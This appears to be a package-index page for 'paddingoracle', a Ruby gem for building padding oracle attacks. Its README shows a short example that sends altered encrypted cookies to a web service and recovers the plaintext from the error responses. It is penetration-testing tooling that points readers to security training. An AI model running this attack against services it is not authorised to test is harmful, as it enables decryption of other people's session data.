Project

paddingoracle

0.0
No commit activity in last 3 years
No release in over 3 years
paddingoracletechnion/paddingoracleHomepageDocumentationSource CodeBug TrackerWiki
A framework for creating custom padding oracle exploits.
2005
2006
2007
2008
2009
2010
2011
2012
2013
2014
2015
2016
2017
2018
2019
2020
2021
2022
2023
2024
2025
 Popularity
Downloads
4,198
Stars
6
Forks
0
Watchers
3
 Releases
Current version
0.2.0
Total releases
2
First release
2017-04-06
Latest release
2017-04-07
 Development
Primary Language
Ruby
Licenses
MIT
Average date of last 50 commits
2017-04-16
Reverse Dependencies
0

 Dependencies

Development

bundler
~> 1.13
httparty
>= 0
minitest
~> 5.0
rake
~> 10.0
 Project Readme

Paddingoracle

This is a Rubyframework for exploiting padding oracle vulnerabilities based on this fantastic Python project:

https://github.com/mwielgoszewski/python-paddingoracle

Build status

Build Status

Usage

You will first need to extend the module with your own padding_oracle function. Example:

require 'httparty'
require 'base64'
require 'uri'

URL = 'http://google.com'
module Paddingoracle
  def decrypt_oracle(string)
    string = URI.escape(Base64.strict_encode64(string))
    response = HTTParty.get(URL, cookies: {auth: string})

    raise "Invalid padding" if response.code != 200
  end
end

You can then run the attack like this;

Blocksize = 8
COOKIE = 'vulnerable encrypted data'
bcookie = Base64.decode64(COOKIE)
plain = Paddingoracle::recover_all_blocks(bcookie, Blocksize)
puts plain

Contributing

This product was written to solve a specific problem - I'm happy to investigate bugs but this type of codebase is not suited to new features or "how to use" requests.

If you are interested in this tool, we highly recommend the training at PentesterLab, which includes a vulnerable service relevant to this tool.

License

The gem is available as open source under the terms of the MIT License.